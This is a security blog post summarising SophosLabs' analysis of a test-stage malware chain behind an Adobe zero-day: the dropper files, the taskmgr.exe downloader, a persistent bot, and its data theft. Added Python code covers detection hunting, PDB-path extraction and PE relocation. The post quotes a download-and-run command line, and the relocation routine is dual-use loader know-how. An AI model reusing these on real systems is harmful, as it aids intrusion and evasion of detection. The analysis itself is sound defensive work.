Adobe Zero-Day Malware Stripped by SophosLabs


A day has gone by since the security firm FireEye claimed to have discovered a zero-day vulnerability affecting Adobe Reader and Acrobat XI. According to FireEye:


Upon successful exploitation, it will drop two DLLs. The first DLL shows a fake error message and opens a decoy PDF document, which is usually common in targeted attacks. The second DLL in turn drops the callback component, which talks to a remote domain.

Adobe, in turn, began to investigate. The investigation took an interesting turn when the companies concerned asked SophosLabs to do some digging of their own into the malware. SophosLabs' Gabor Szappanos and Peter Szabo share their intriguing findings.


The duo begins by saying, "It seems as though we jumped right into the middle of the development and testing phase of the project," meaning that the samples they examined look like a work in progress rather than a finished attack.

Gabor and Peter tell us that they discovered a "targeted malware test bed, a zero-day vulnerability and some digitally signed malware". These files differed from typical targeted attacks in how they implemented the exploits: they used no anti-debugging or anti-antivirus tricks, and the malware consisted of "debug builds with debug paths stored in each component". The pathnames seem to suggest that the files were part of a classified operation, but that is most likely a deliberate smokescreen; a genuinely "classified" operation would be rather more "classified" than what we see here.



This, it seems, was a "testing rig operated by a criminal gang to field-test its latest creation", and the malware it comprises has been seen before and is already detected by Kaspersky Labs.

Discovery of Malware Components

The attack begins when the attacker emails the victim a link that the victim is enticed to click. The link leads to a chain of malicious components hosted on a server in Turkey, which then compromises the computer with an Adobe Flash exploit. The incomplete code and the unusual malware suggest that the cybercrime gang isn't quite done with this particular attack, but SophosLabs managed to analyse the malware in its entirety. The attack is carried out by first dropping a number of malicious files onto your computer:
  1. A downloader program, packaged in a file called scode.dll dropped into a directory that's part of your Flash installation, where Flash expects and looks for add-in code
  2. A shellcode file called scodeexp.txt. (This file is specific to the Windows XP platform.)
  3. A shellcode file called scode.txt. (This is for computers not running XP.) 
Sophos products detect these files as Troj/FSBSpy-A.

The Attack Continues

And the party commences:
  1. The shellcode loads the scode.dll to take over the dirty work. (A DLL is really just an executable file in a special format.)
  2. The DLL contains an embedded EXE file, which it drops into the temporary folder with the bogus name taskmgr.exe.
  3. The DLL launches the newly-dropped taskmgr program with the command line dl http://www.[redacted]/ explorer.exe.
According to SophosLabs, this is how the malware operates:


The bogus taskmgr executable isn't particularly ambitious. It doesn't check that the first parameter is dl, merely that there is one, and it doesn't bother checking to see if its second parameter really is a URL.

It simply downloads whatever it can from the URL it was given, saving it into the temporary folder and launching it. We're still not done. When the bogus explorer.exe runs, it copies itself to the startup folder, choosing the rather less dubious name IAStorIcon.exe. Now, of course, you're actively infected, and the infection is persistent. (That is a fancy way of saying that your malware survives between logins or reboots, rather than expiring at the end of the current user's session.)
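The chain above (a system-binary name running from a temp folder, a URL handed to it on the command line, the dropped explorer.exe spawned by it, and IAStorIcon.exe launched from the Startup folder) is what a process-creation log would show. The following is an added detection example, not SophosLabs' code: it runs a handful of hunting rules over Sysmon-like events that are constructed here (paths, the `example.invalid` URL standing in for the redacted domain, and the AcroRd32.exe parent are all assumptions).

```python
"""Hunt for the infection chain described above in process-creation events.

Added example, not SophosLabs' code. The event shape (image path, command
line, parent image) is Sysmon-like; the events below are constructed.
"""
import re
from dataclasses import dataclass

# Where the genuine taskmgr.exe and explorer.exe live; copies dropped into
# a temp folder are not here.
WINDOWS_ROOT = "c:\\windows\\"
# Roots where a URL on the command line is routine (browsers, updaters).
TRUSTED_ROOTS = (WINDOWS_ROOT, "c:\\program files\\", "c:\\program files (x86)\\")
MASQUERADED = {"taskmgr.exe", "explorer.exe"}   # names reused by the dropper
PERSIST_NAME = "iastoricon.exe"                 # name used in the Startup folder
URL_ARG = re.compile(r"\S+://\S+")


@dataclass
class ProcessEvent:
    image: str              # full path of the new process
    cmdline: str            # its command line
    parent_image: str = ""  # full path of the parent process


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _under(path: str, roots) -> bool:
    return path.lower().startswith(tuple(roots))


def classify(ev: ProcessEvent) -> list[str]:
    """Return the reasons this event matches the chain (empty list = clean)."""
    hits = []
    name = _name(ev.image)
    if name in MASQUERADED and not _under(ev.image, (WINDOWS_ROOT,)):
        hits.append(f"{name} running outside the Windows directory")
    # The article notes the bogus taskmgr only requires *some* first argument,
    # so key on the URL rather than on the literal 'dl'.
    if URL_ARG.search(ev.cmdline) and not _under(ev.image, TRUSTED_ROOTS):
        hits.append("URL argument passed to a binary outside trusted roots")
    if name == PERSIST_NAME and "\\startup\\" in ev.image.lower():
        hits.append("IAStorIcon.exe launched from a Startup folder")
    parent = _name(ev.parent_image)
    if parent in MASQUERADED and not _under(ev.parent_image, (WINDOWS_ROOT,)):
        hits.append(f"spawned by a masqueraded {parent}")
    return hits


def hunt(events) -> dict[str, list[str]]:
    """Map each suspicious image path to its list of reasons."""
    return {ev.image: h for ev in events if (h := classify(ev))}


# Constructed sample events: one benign Task Manager launch, then the chain.
TEMP = "C:\\Users\\alice\\AppData\\Local\\Temp\\"
STARTUP = ("C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\"
           "Start Menu\\Programs\\Startup\\")
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\taskmgr.exe", "taskmgr.exe",
                 "C:\\Windows\\explorer.exe"),
    ProcessEvent(TEMP + "taskmgr.exe",
                 "taskmgr.exe dl http://www.example.invalid/ explorer.exe",
                 "C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.exe"),  # parent assumed
    ProcessEvent(TEMP + "explorer.exe", "explorer.exe", TEMP + "taskmgr.exe"),
    ProcessEvent(STARTUP + "IAStorIcon.exe", "IAStorIcon.exe", "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS).items():
        print(image, "->", "; ".join(reasons))
```

The benign System32 taskmgr.exe produces no hits; the three dropped processes each trip at least one rule, and the temp-folder explorer.exe is caught both by its location and by its parent, so the parent-child rule still fires even if the dropper is renamed later.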

The downloader components were compiled in debug mode, so they contain references to PDB files. PDB stands for Program Database, which is where symbolic information about the program is stored. You don't usually ship debugging information with your software. Firstly, it gives away intimate information about its internals; secondly, it greatly increases the size of your shipping code. The names of the PDB files are interesting:

C:\ClassifiedProjects\ProjectDefense\FirefoxBinaryLoadedWithCertificate\LoaderFirefoxSigned\LoaderReleaseFinalCERT.pdb (in the dropper DLL)
C:\Classified\Investigations\NationalSecurity\sco.pdb (in the dropper EXE)

As we mentioned above, the names are not merely suggestive of a classified security operation, but indeed overly suggestive. It seems unlikely that such an operation would use such obvious filenames, so they're probably just a smokescreen of sorts.
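A PDB reference survives in a PE file as a CodeView debug record: the signature `RSDS`, a 16-byte GUID, a 4-byte age, and the NUL-terminated path. The following is an added example, not SophosLabs' tooling, showing how to pull such records out of a binary without a full PE parser; the sample image is constructed here, with the two paths quoted above and made-up GUIDs and ages.

```python
"""Pull CodeView 'RSDS' debug records (and thus PDB paths) out of a PE image.

Added example, not SophosLabs' tooling. The image below is constructed: the
two paths are the ones quoted above, the GUIDs and ages are made up.
"""
import struct
import uuid

CV_SIG = b"RSDS"   # CodeView signature for PDB 7.0 records
MAX_PATH = 260


def find_pdb_records(data: bytes):
    """Return [(pdb_path, guid, age)] for every plausible RSDS record in data.

    Layout: 'RSDS' | GUID (16 bytes, little-endian fields) | age (u32) | path\\0.
    A record is only accepted if the path is printable ASCII ending in .pdb,
    which filters out the signature bytes turning up by chance.
    """
    found = []
    pos = data.find(CV_SIG)
    while pos != -1:
        hdr_end = pos + 4 + 16 + 4
        if hdr_end <= len(data):
            nul = data.find(b"\0", hdr_end, hdr_end + MAX_PATH)
            if nul != -1:
                raw = data[hdr_end:nul]
                if raw.lower().endswith(b".pdb") and all(0x20 <= b < 0x7F for b in raw):
                    guid = uuid.UUID(bytes_le=data[pos + 4:pos + 20])
                    (age,) = struct.unpack_from("<I", data, pos + 20)
                    found.append((raw.decode("ascii"), str(guid), age))
        pos = data.find(CV_SIG, pos + 4)
    return found


def _rsds(path: str, guid: bytes, age: int) -> bytes:
    """Build one RSDS record for the constructed sample."""
    return CV_SIG + guid + struct.pack("<I", age) + path.encode("ascii") + b"\0"


DLL_PDB = r"C:\ClassifiedProjects\ProjectDefense\FirefoxBinaryLoadedWithCertificate\LoaderFirefoxSigned\LoaderReleaseFinalCERT.pdb"
EXE_PDB = r"C:\Classified\Investigations\NationalSecurity\sco.pdb"

# Constructed stand-in for a binary: a stray 'RSDS' that must be ignored,
# then two genuine-looking records separated by padding.
SAMPLE_IMAGE = (
    b"MZ" + b"\0" * 62
    + b"RSDS not a real record"
    + b"\0" * 8
    + _rsds(DLL_PDB, bytes(range(16)), 1)
    + b"\x90" * 32
    + _rsds(EXE_PDB, b"\xff" * 16, 2)
    + b"\0" * 16
)

if __name__ == "__main__":
    for path, guid, age in find_pdb_records(SAMPLE_IMAGE):
        print(f"{path}  guid={guid} age={age}")
```

Point the function at the raw bytes of any PE and it returns the paths in order of appearance; on a real analysis the GUID and age are what you would match against a PDB on a symbol server, and the path itself is the kind of operator slip (or, as here, decoy) worth recording as an indicator.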



The malware itself, explorer.exe, is digitally signed with a valid certificate, or at least with a certificate that isn't merely home made, and hasn't expired. Sophos products detect files signed with this certificate as Troj/FSBSpy-B, and SophosLabs telemetry indicates that there are at least three more related pieces of malware currently detected in the wild.

What the Malware does:

The explorer.exe program is a bot (zombie malware). It contacts a Command and Control server at a fixed IP address. This IP belongs to a hosting provider in the Netherlands.

The malware has three primary objectives:


  1. It retrieves a basic system inventory.
  2. It can be remotely commanded to take and upload screenshots.
  3. It can be remotely commanded to download and run new malware.

The bot's handling of newly downloaded malware is the sophisticated part: the downloads never appear as files on disk, which makes them much harder to spot.

According to SophosLabs:

The explorer.exe bot has a built-in program loader that constructs an executable software image directly in memory. This loader handles function imports, relocations and more, just like the operating system does when it loads a program from disk.

Once the new malware download has been built into an executable image in memory, it is called directly. No separate process or thread is created.
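"Handles function imports, relocations and more" is the work the OS loader normally does when it maps a PE. Of those steps, relocation is the one that is easy to show in isolation: when the image cannot be placed at its preferred base, every absolute address inside it must be shifted by the difference. The following is an added example, not the bot's code, that applies the base-relocation table of a constructed 8 KiB image; the preferred base, the pointer values and the relocation block are all made up here.

```python
"""Apply PE base relocations to an image already mapped at its RVAs.

Added example, not the bot's code: it shows the relocation step that any
in-memory loader has to perform when the image cannot land at its preferred
base. The image and relocation table below are constructed.
"""
import struct

IMAGE_REL_BASED_ABSOLUTE = 0   # padding entry, skip
IMAGE_REL_BASED_HIGHLOW = 3    # 32-bit absolute address
IMAGE_REL_BASED_DIR64 = 10     # 64-bit absolute address


def apply_relocations(image: bytearray, reloc_rva: int, reloc_size: int, delta: int) -> int:
    """Walk the IMAGE_BASE_RELOCATION blocks and add `delta` to each fixup.

    `image` is the section-mapped view (RVA == offset), `reloc_rva`/`reloc_size`
    come from the base-relocation data directory, `delta` is actual base minus
    preferred base. Returns the number of fixups applied.
    """
    applied = 0
    off, end = reloc_rva, reloc_rva + reloc_size
    while off + 8 <= end:
        page_rva, block_size = struct.unpack_from("<II", image, off)
        if block_size < 8 or off + block_size > end:
            raise ValueError("malformed relocation block")
        for i in range((block_size - 8) // 2):
            (entry,) = struct.unpack_from("<H", image, off + 8 + 2 * i)
            kind, target = entry >> 12, page_rva + (entry & 0xFFF)
            if kind == IMAGE_REL_BASED_ABSOLUTE:
                continue
            if kind == IMAGE_REL_BASED_HIGHLOW:
                (v,) = struct.unpack_from("<I", image, target)
                struct.pack_into("<I", image, target, (v + delta) & 0xFFFFFFFF)
            elif kind == IMAGE_REL_BASED_DIR64:
                (v,) = struct.unpack_from("<Q", image, target)
                struct.pack_into("<Q", image, target, (v + delta) & 0xFFFFFFFFFFFFFFFF)
            else:
                raise ValueError(f"unsupported relocation type {kind}")
            applied += 1
        off += block_size
    return applied


PREFERRED_BASE = 0x00400000          # assumed ImageBase of the constructed image
RELOC_RVA, RELOC_SIZE = 0x1800, 16   # assumed base-relocation directory


def build_sample_image() -> bytearray:
    """Constructed 8 KiB image: two absolute pointers in the page at RVA 0x1000
    and one relocation block describing them (two HIGHLOW entries plus two
    ABSOLUTE pads, 16 bytes in total)."""
    image = bytearray(0x2000)
    struct.pack_into("<I", image, 0x1010, PREFERRED_BASE + 0x1234)
    struct.pack_into("<I", image, 0x1020, PREFERRED_BASE + 0x2000)
    struct.pack_into("<II", image, RELOC_RVA, 0x1000, RELOC_SIZE)
    struct.pack_into("<4H", image, RELOC_RVA + 8,
                     (IMAGE_REL_BASED_HIGHLOW << 12) | 0x010,
                     (IMAGE_REL_BASED_HIGHLOW << 12) | 0x020,
                     0, 0)
    return image


def relocate_to(actual_base: int):
    """Relocate the sample image to `actual_base`; return (count, ptr1, ptr2)."""
    image = build_sample_image()
    n = apply_relocations(image, RELOC_RVA, RELOC_SIZE, actual_base - PREFERRED_BASE)
    (p1,) = struct.unpack_from("<I", image, 0x1010)
    (p2,) = struct.unpack_from("<I", image, 0x1020)
    return n, p1, p2


if __name__ == "__main__":
    n, p1, p2 = relocate_to(0x10000000)
    print(f"{n} fixups applied: {p1:#010x} {p2:#010x}")
```

The same walk is what makes a memory-only payload detectable in a different way: a region of private, executable memory whose contents look like a relocated PE (pointers all pointing back into the region) but which is backed by no file on disk.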

What the Malware Steals:

  1. CPU type
  2. memory size
  3. disk size
  4. free disk space
  5. Windows version
  6. registration details
  7. user information
  8. timezone
  9. SID
  10. a list of installed applications

The researchers write:

Communications with the C&C server, including uploads and downloads, are encrypted using the AES algorithm; the encryption key is embedded into the bogus explorer.exe. The malware also contains code to find files named *tmp in the temporary folder and upload them. However, this code is never used - another indication that the malware is incomplete.


Lastly, the malware is full of debug messages. Indeed, if it is running from process ID 4 (the System process), it annotates its progress with a chatty sequence of alerts, such as I'm going to start the program, in pop-up message boxes.
Cheers!

About The Author
This article is written by Sindhia Javed Junejo. She is one of the core members of RHA team.